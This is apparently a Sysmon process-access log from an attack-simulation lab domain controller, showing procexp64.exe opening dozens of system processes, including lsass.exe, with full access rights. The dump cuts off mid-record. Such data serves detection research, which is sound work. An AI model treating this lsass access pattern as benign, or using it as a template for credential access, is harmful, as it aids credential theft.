15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787949Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787948Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787947Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787946Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787945Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787944Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787943Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787942Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787941Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787940Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787939Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787938Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787937Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787936Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787935Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787934Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787933Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787932Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787931Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787930Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787929Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787928Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787927Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788050Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788049Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788048Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788047Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788046Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788045Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788044Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788043Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788042Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788041Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788040Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788039Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788038Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788037Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet 